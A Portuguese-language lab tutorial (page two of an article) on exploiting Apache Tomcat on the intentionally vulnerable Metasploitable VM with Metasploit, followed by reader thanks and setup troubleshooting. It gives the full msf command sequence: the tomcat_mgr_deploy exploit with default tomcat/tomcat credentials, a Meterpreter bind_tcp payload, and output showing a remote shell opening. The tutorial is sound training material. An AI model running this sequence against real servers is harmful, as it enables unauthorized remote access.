Atirando o pau no gato com Metasploit

O artigo foi criado para fins éticos, e tem a função de demonstrar (para aqueles que estão iniciando) um pedaço do "poder de fogo" do Metasploit Framework. Para tal, iremos explorar vulnerabilidades na aplicação Tomcat (servidor de aplicações JEE) presente no Metasploitable.

[ Hits: 23.589 ]

Por: Bruno Rocha da Silva em 05/01/2012 | Blog: http://about.me/brunorochadasilva


Explorando o Tomcat



Com a parte de 'fingerprint' concluída, é hora de procurarmos um Exploit:

msf auxiliary(tomcat_mgr_login) > back
msf > search tomcat

Perceba que existe apenas um Exploit para explorar o Tomcat (o restante são módulos auxiliares), conseguimos mais informações deste Exploit com o comando:

msf > info exploit/multi/http/tomcat_mgr_deploy

Perceba que a função do Exploit é injetar um Payload no 'Apache / Tomcat' a fim de obter acesso à aplicação.

msf > use exploit/multi/http/tomcat_mgr_deploy
msf exploit(tomcat_mgr_deploy) > show options

Com as opções listadas, é necessário setar algumas delas, como USERNAME, PASSWORD, RHOST e RPORT:

msf exploit(tomcat_mgr_deploy) > set USERNAME tomcat
msf exploit(tomcat_mgr_deploy) > set PASSWORD tomcat
msf exploit(tomcat_mgr_deploy) > set RHOST 192.168.200.66
msf exploit(tomcat_mgr_deploy) > set RPORT 8180

Encontrando um Payload

Agora é necessário encontrar um Payload para mantermos acesso ao sistema que hospeda a aplicação. Neste caso, através de uma shell:

msf exploit(tomcat_mgr_deploy) > show payloads

O comando 'show payloads', demonstra quais são os Payloads que podemos utilizar com esse Exploit.

Nesse caso, utilizarei o Payload 'java/meterpreter/bind_tcp', que tem a função de fornecer um 'Shell Meterpreter' ao atacante:

msf exploit(tomcat_mgr_deploy) > set payload java/meterpreter/bind_tcp

Feito isto, basta executar o comando 'exploit', e aguardar o shell meterpreter:

msf exploit(tomcat_mgr_deploy) > exploit

Saída do comando:
[*] Started bind handler
[*] Attempting to automatically select a target...
[*] Automatically selected target "Linux x86"
[*] Uploading 6219 bytes as yA3qxprcUAWuRo1mgLlruBue.war...
[*] Executing /yA3qxprcUAWuRo1mgLlruBue/fwPtbEiJ611zikx4AkQ0u5ddQs.jsp...
[*] Undeploying yA3qxprcUAWuRo1mgLlruBue...
[*] Sending stage (28469 bytes) to 192.168.200.66
[*] Meterpreter session 1 opened (192.168.200.3:59842 -> 192.168.200.66:4444) at 2011-12-29 13:24:00 -0200

meterpreter >

E ... VOILÀ !!

Conseguimos acesso ao sistema. Para saber quais comandos executar no Meterpreter, utilize o comando 'help':

meterpreter > help

Caso não se familiarize com o 'Shell Meterpreter', basta utilizar o comando 'shell', que o mesmo passará a ser o shell do sistema atacado, no nosso caso, o Bash.

meterpreter > shell

Espero que tenham gostado.

Até a próxima!

Página anterior    

Páginas do artigo
   1. Introdução e Levantamento de informações
   2. Explorando o Tomcat
Outros artigos deste autor

SELinux - Segurança em Servidores GNU/Linux

Leitura recomendada

Monitorando redes utilizando Ntop

Distribuição CAINE Linux para forense digital: em Live-CD, pendrive, máquina virtual ou direto em seu Ubuntu 10.04

Trilhas de Certificação em Segurança da Informação - Qual caminho seguir?

AUDIT: Auditoria de arquivos no Linux para conhecer quem fez alterações em arquivos

TrueCrypt Forever

  
Comentários
[1] Comentário enviado por removido em 05/01/2012 - 11:28h

Ótimo artigo !

Show !

Irei começar a postar alguns sobre o Metasploit também, assim que tiver tempo.

Abraço.

[2] Comentário enviado por brunordasilva em 05/01/2012 - 14:21h

Obrigado pelos comentários Thalysson S,

Forte Abraço!

[3] Comentário enviado por ricardoolonca em 05/01/2012 - 16:19h

Parabéns pelo artigo. Já tinha instalato o Metasploit, mas ainda não conhecia o console dele.

[4] Comentário enviado por dimasdaros em 05/01/2012 - 17:08h

Muito bom o artigo, e muito bem explicado.

Não conhecia o metasploitable, estou fazendo o download dele para verificar.


Muito obrigado pela contribuição, brunordasilva, tenho conhecimento bem básico do metasploit, esse seu artigo me ajudou muito, pode ter certeza.

Abraço.
Dimas.

--
Off

Você nasceu em 1993 cara?
Parabéns pelo empenho e estudo, virei seu fã já.

[5] Comentário enviado por brunordasilva em 05/01/2012 - 17:24h

Obrigado Ricardo Lino Olonca, espero que este artigo sirva como pontapé inicial no console do metasploit,
forte abraço!

[6] Comentário enviado por brunordasilva em 05/01/2012 - 17:30h

Fico feliz que tenha gostado Dimas, e se foi útil então, melhor ainda, rs!

Forte abraço Dimas!

[7] Comentário enviado por tatuiano em 05/01/2012 - 22:11h

duro é esse povo que tem inveja de quem escreve bem.por isso toma mais um dez para subir tua nota.

[8] Comentário enviado por thiago_e_souza em 06/01/2012 - 14:35h

para bens muito bom o artigo

[9] Comentário enviado por thiago_e_souza em 06/01/2012 - 16:56h

e só uma coisa qual as configurações do virtualbox para utilizar essa vm Metasploitable?

[10] Comentário enviado por brunordasilva em 06/01/2012 - 17:03h

Thiago Souza, quando você diz configurações, seria requisitos mínimos, como memória por exemplo?

Se sim, de acordo com Metasploit Project, o Metasploitable necessita de apenas 512MB de Memória e seu disco contém apenas 8GB.

[11] Comentário enviado por thiago_e_souza em 06/01/2012 - 18:17h

então era quanto ao sistema utilizado mas já vi mas não inicia correctamente vou tentar fim de semana em casa precisso sair agora abraços e se nao conseguir ai vejo o que da para fazer obrigado bom fds para todos...

[12] Comentário enviado por crf-rafa em 07/01/2012 - 09:58h

Então Bruno, otimo artigo. Vou começar a estudar um pouco o Metasploit, tenho curiosidade na area de segurança e ainda não me decidi sobre minha pos-graduaçao
Tem material pra indicar?

[13] Comentário enviado por brunordasilva em 08/01/2012 - 01:10h

Boa Noite Rafael,

Como deve saber, a área de Segurança da Informação é muito ampla e complexa, mas pra você que tem curiosidade na área, uma boa pedida será ler as normas ABNT ISO 27001 e 27002.
Existem bons livros também, como o "BS7799 da tática à prática em servidores Linux" e "Praticando a Segurança da Informação".

A partir dai, você já consegue ter uma visão minima do que é Segurança da Informação, e consequentemente selecionar a área que mais lhe interessa (ex: auditoria, teste de invasão, computação forense, etc...).

Espero ter ajudado Rafael,

Abraços!


[14] Comentário enviado por thiago_e_souza em 09/01/2012 - 14:29h

para o Metasploitable alem de alterar a opção 'IO APIC', tem mais alguma coisa? não rodou no meu virtual box... e nao encontrei muita coisa no google para ajudar...

[15] Comentário enviado por brunordasilva em 09/01/2012 - 15:52h

Thiago, qual S.O você está utilizando, e qual a versão da Virtual Box?

Estou utilizando Debian 6 com a Virtual Box V-4.1.8, e foi apenas essa opção que alterei.

Abraços!

[16] Comentário enviado por thiago_e_souza em 09/01/2012 - 16:47h

Estou utilizando o Ubuntu 11.10 com o Virtualbox disponivel pela central de programas do Ubuntu, não lembro qual a versão dele.

[17] Comentário enviado por brunordasilva em 09/01/2012 - 17:00h

Thiago,

Abre o Gerenciador da Virtual Box, clique em "Ajuda (H)", depois em "Sobre o Virtual Box", no rodapé existe a versão do mesmo!

Não sei como funciona a central de programas do Ubuntu, mas aconselho você baixar o .deb no site de dowloads da Virtual Box "https://www.virtualbox.org/wiki/Downloads", assim você consegue a ultima versão, com todas as correções de bug e melhorias.

Abraços!

[18] Comentário enviado por thiago_e_souza em 09/01/2012 - 17:10h

ok, mas infelizmente vai terque ficar para amanha... pois meu note fico em casa... e to sem net lá... mas amanha checo o virtual box e se for o caso reisntalo ele...

att.

[19] Comentário enviado por thiago_e_souza em 10/01/2012 - 10:14h

bom dia, consegui em fim... atualizei o virtualbox e não somente selecionando a opção "IO APIC" mas tambem habilitei "PAE/NX" brigado pela ajuda.

[20] Comentário enviado por brunordasilva em 10/01/2012 - 10:17h

Sucesso Thiago,

Não mencionei essa opção, pois sempre quando instalei a Virtual Box (atuais), já vinham com essa opção habilitada!

Abraços!

[21] Comentário enviado por thiago_e_souza em 10/01/2012 - 10:28h

mesmo com meu ingles péssimo ainda deu para encontrar algo que dizia para abilitar, aliais ainda nem sei para que serve essa opçao tenho que ver um pouco mais do vb para intender melhor seus recursos... mas agradeço pela ajuda... tenho minhas ambiçoes em aprender e se nao aprender a procurar um pouco mais nao vai adianta ter tudo na mão...

[22] Comentário enviado por thiago_e_souza em 10/01/2012 - 13:35h

nesse momento ao executar ->
msf auxiliary(tomcat_administration) > run

Saída do comando:
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed


sem as informaçoes como no seu exemplo acima (o tomcat esta iniciado no servidor o ip servidor mas nao retorna as informaçoes)

[*] http://192.168.200.66:8180/admin [Apache-Coyote/1.1] [Apache Tomcat/5.5] [Tomcat Server Administration] [tomcat/tomcat]

[23] Comentário enviado por thiago_e_souza em 10/01/2012 - 14:21h

utilizando o Nmap para fazer um scan completo no servidor ele nao consta como nenhuma porta aberta... mas nao entendo como isso se os serviços estao rodando...

[24] Comentário enviado por brunordasilva em 10/01/2012 - 15:12h

Thiago,

Verifique quais portas estão abertas na sua máquina local:

# netstat -nltup

O Backtrack e o Metasploitable estão na mesma rede? O IP está correto?

Abraços!

[25] Comentário enviado por thiago_e_souza em 10/01/2012 - 16:41h

Muito brigado... consegui agora tudo certo...


[26] Comentário enviado por AlanMenezes em 22/01/2012 - 18:23h

Muito bom ! Vou copiar e colocar no fórum Amantes do Metasploit

http://www.amantesdometasploit.com.br

[27] Comentário enviado por brunordasilva em 22/01/2012 - 23:09h

Show de bola Alan Menezes :)

Aproveitando, parabéns pelo site, muito boa iniciativa!

Abraços!

[28] Comentário enviado por m4cgbr em 06/05/2012 - 06:28h

Show de bola, obrigado por compartilhar!

Para quem não conhece, existe também um ótimo Framework para testes e audotoria, o w3af, segue o link http://w3af.sourceforge.net/

Abs


Contribuir com comentário




Patrocínio

Site hospedado pelo provedor RedeHost.
Linux banner

Destaques

Artigos

Dicas

Tópicos

Top 10 do mês

Scripts